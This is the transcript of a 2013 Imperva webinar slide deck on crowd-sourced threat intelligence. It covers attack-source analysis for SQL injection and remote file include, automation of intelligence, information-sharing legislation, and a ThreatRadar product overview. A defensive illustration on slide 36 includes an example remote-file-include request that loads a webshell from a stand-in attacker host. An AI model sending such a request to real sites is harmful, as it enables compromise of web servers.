The Value of Crowd-Sourced Threat Intelligence
-
Upload
imperva -
Category
Technology
-
view
889 -
download
2
description
Transcript of The Value of Crowd-Sourced Threat Intelligence
© 2013 Imperva, Inc. All rights reserved.
Crowd Sourced Threat Intelligence
Amichai Shulman, CTO, Imperva
Confidential 1
May 2013
© 2013 Imperva, Inc. All rights reserved.
Agenda
Confidential 2
§ Introduction to crowd sourcing and threat intelligence § Application layer threat intelligence
• Research report
§ Actionable threat intelligence • Turning threat intelligence into community defense
§ Threat intelligence and legislation • Pros, Cons and Etat D’Affaire
§ Summary & conclusions § Q&A
© 2013 Imperva, Inc. All rights reserved.
Amichai Shulman – CTO Imperva
Confidential 3
§ Speaker at Industry Events • RSA, Appsec, Info Security UK, Black Hat
§ Lecturer on Information Security • Technion - Israel Institute of Technology
§ Former security consultant to banks & financial services firms
§ Leads the Application Defense Center (ADC) • Discovered over 20 commercial application vulnerabilities
§ Credited by Oracle, MS-SQL, IBM and others
Amichai Shulman one of InfoWorld’s “Top 25 CTOs”
© 2013 Imperva, Inc. All rights reserved.
HII Reports
Confidential 4
§ Hacker Intelligence Initiative is focused at understanding how attackers are operating in practice • A different approach from vulnerability research
§ Data set composition • ~60 real world applications • Anonymous Proxies
§ More than 24 months of data § Powerful analysis system
• Combines analytic tools with drill down capabilities
© 2013 Imperva, Inc. All rights reserved.
Introduction
Confidential 5
Crowd Sourcing and Threat Information Sharing
© 2013 Imperva, Inc. All rights reserved.
What is Crowd Sourcing
Confidential 6
§ “The Wisdom of Crowds: Why the Many Are Smarter Than the Few and How Collective Wisdom Shapes Business, Economies, Societies and Nations”*
© 2013 Imperva, Inc. All rights reserved.
Crowd Sourcing in Practice
Confidential 7
© 2013 Imperva, Inc. All rights reserved.
Threat Information Sharing
Confidential 8
§ AV vendor customers sharing suspicious files with their vendors • Manual process • If not manual than how do you define suspicious?
§ Anti-spam vendors collecting email data from all deployments • Privacy? • Confidentiality
§ Customer groups for sharing battle stories • Timely?
© 2013 Imperva, Inc. All rights reserved.
Threat Intelligence
Confidential 9
§ Infer NEW information regarding future attacks from looking at past attacks
§ Attacks across organizations share common characteristics • Sources • Techniques • Tools • Timelines
© 2013 Imperva, Inc. All rights reserved.
Application Layer Threat Intelligence
Confidential 10
Research report
© 2013 Imperva, Inc. All rights reserved.
Some Observations
Confidential 11
§ Most web attacks are part of large scale industrialized operations • Reuse of attack platforms • Reuse of techniques • Reuse of tools
§ Attack campaigns span meaningful time frames
© 2013 Imperva, Inc. All rights reserved.
More Observations
Confidential 12
§ Izzadin Kassam attacks on US banks • Started with a few banks 4 months ago • Gradually add more targets to the list
§ #OpIsrael / #OpUSA / #OpColombia … • Attacks by hacktivists • Targeted for a specific time frame • Pick up many victims and target them with the SAME exact tools
over the attack time frame
© 2013 Imperva, Inc. All rights reserved.
Methodology
Confidential 13
§ Attack data only • 60 applications • 6 months of data
§ Analyze dominant attack types • SQL Injection • Remote File Include • Comment Spam • Local File Include • Directory Traversal
© 2013 Imperva, Inc. All rights reserved.
SQL Injection – Source Threat Quadrant
Confidential 14
Multi target, persistent sources
Multi target sources
Persistent sources Singletons
© 2013 Imperva, Inc. All rights reserved.
SQL Injection – Source Threat Quadrant
Confidential 15
Multi target, persistent sources
© 2013 Imperva, Inc. All rights reserved.
SQL Injection – Time Perspective
Confidential 16
0
2
4
6
8
10
12
14
16
18
01/0
1/20
13
03/0
1/20
13
05/0
1/20
13
07/0
1/20
13
09/0
1/20
13
11/0
1/20
13
13/0
1/20
13
15/0
1/20
13
17/0
1/20
13
19/0
1/20
13
21/0
1/20
13
23/0
1/20
13
25/0
1/20
13
27/0
1/20
13
29/0
1/20
13
31/0
1/20
13
02/0
2/20
13
04/0
2/20
13
06/0
2/20
13
08/0
2/20
13
10/0
2/20
13
12/0
2/20
13
14/0
2/20
13
16/0
2/20
13
18/0
2/20
13
20/0
2/20
13
22/0
2/20
13
24/0
2/20
13
26/0
2/20
13
28/0
2/20
13
Targ
ets
Accumulating
Current
© 2013 Imperva, Inc. All rights reserved.
Comment Spam – Source Threat Quadrant
Confidential 17
Multi target, persistent sources
© 2013 Imperva, Inc. All rights reserved.
Remote File Include – URL Threat Quadrant
Confidential 18
Multi target, persistent vectors
© 2013 Imperva, Inc. All rights reserved.
Remote File Include - Example
Confidential 19
§ Reconnaissance campaign based on benign URL • http://google.com/humans.txt
§ 11 different applications targeted using the same URL • 5144 different requests
§ Spread throughout an entire month § Next slide shows a network graph of attack sources to
targets • We can learn about the relationship between attack sources
© 2013 Imperva, Inc. All rights reserved.
Remote File Include - Example
Confidential 20
© 2013 Imperva, Inc. All rights reserved.
Use of Attack Tools
Confidential 21
Percentage of Automated Attacks
0%
10%
20%
30%
40%
50%
60%
70%
80%
90%
100%
RFI LFI SQLi ComSpm XSS DT
Total Attacks Automated
© 2013 Imperva, Inc. All rights reserved.
Actionable Threat Intelligence
Confidential 22
Turning Threat Intelligence Into Community Defense
© 2013 Imperva, Inc. All rights reserved.
Actionable Intelligence Life Cycle
Confidential 23
Known attack patterns
Apply on traffic to identify attackers
Known attackers
Apply on traffic to identify new
patterns
© 2013 Imperva, Inc. All rights reserved.
Actionable Threat Intelligence
Confidential 24
§ Multiphase • Distributed data collection • Information extraction • Analysis and knowledge generation • Knowledge validation • Distribution of knowledge to devices
§ Cycle must be completely automated in order to provide value in a timely manner and at scale • Not an information sharing hub
© 2013 Imperva, Inc. All rights reserved.
The Cost of Decision Making
Confidential 25
§ Problem scale is increasing • Number of attacks is constantly growing • Number of applications per organization is growing
§ Resources are stagnant • No additional HC
§ Organizations must reduce the proportion of alerts that require human decision making
§ By introducing mechanisms based on actionable intelligence, organizations increase the accuracy of detection with respect to a larger portion of the attacks
© 2013 Imperva, Inc. All rights reserved.
Threat Intelligence and Legislation
Confidential 26
Pros, Cons and Etat D’Affaire
© 2013 Imperva, Inc. All rights reserved.
Current Legislation
Confidential 27
§ US Cyber Intelligence Sharing and Protection Act (CISPA) • Passed late April 2013 • Sets up the LEGAL grounds for bilateral information sharing
between private sector entities and government entities • Addresses issues of eligibility, liability and protection of share
information
© 2013 Imperva, Inc. All rights reserved.
Current Legislation
Confidential 28
§ UK Cyber Security Information Sharing Partnership (CISP) • Launched Late March 2013 (piloted through 2012) • Sets up procedural and technical grounds for information sharing
between private sector and government • Comprises an operations room, reporting portal and program
definitions • Similar program exists for cyber crime (CCRP)
© 2013 Imperva, Inc. All rights reserved.
Cons
Confidential 29
§ Misuse of information by governments • Invade privacy in various ways • Otherwise would require court order
§ Information sharing platform • Does not provide for extraction of actionable intelligence
§ Governments usually do things the wrong way • E.g. the complexity of the STIX language
© 2013 Imperva, Inc. All rights reserved.
Pros
Confidential 30
§ Regulate how data is being anonymized and protected § Encourage more organizations to take part in this effort
• Achieve better results faster • Reduce overall damage to public
§ Standardize on various components
© 2013 Imperva, Inc. All rights reserved.
Summary & Conclusions
Confidential 31
© 2013 Imperva, Inc. All rights reserved.
Summary
Confidential 32
§ Threat intelligence has a measurable potential value for Web application attacks
§ Threat intelligence can be used to identify and detect attack sources, attack vectors and attack tools
§ Actionable threat intelligence is crucial for exploiting the potential value of threat intelligence • Not information sharing hubs • No manual processes
§ Actionable threat intelligence helps organizations reduce the cost of security decision making and enables them to handle increasing volumes of attack traffic
© 2013 Imperva, Inc. All rights reserved.
ThreatRadar Community Defense
Confidential 33
© 2013 Imperva, Inc. All rights reserved.
ThreatRadar Community Defense
34
© 2013 Imperva, Inc. All rights reserved.
ThreatRadar Community Defense
35
ThreatRadar Community Defense
§ Gathers live attack data from SecureSphere WAFs around the world
§ Distributes attack patterns and reputation data in near-real time
© 2013 Imperva, Inc. All rights reserved.
1. SecureSphere detects a possible RFI attack
ThreatRadar Servers
Internet User
Web Servers
2. Sends event to ThreatRadar Cloud
Community Defense – How It Works
© Copyright 2012 Imperva, Inc. All rights reserved. 36
/vulnerable.php?C=http://evil.com/webshell.txt?
3. If ThreatRadar verifies site is malicious, it will distribute new RFI pattern to community
© 2013 Imperva, Inc. All rights reserved.
Webinar Materials
Confidential 37
Post-Webinar Discussions
Answers to Attendee
Questions
Webinar Recording Link Join Group
Join Imperva LinkedIn Group, Imperva Data Security Direct, for…
© 2013 Imperva, Inc. All rights reserved.
www.imperva.com
38 Confidential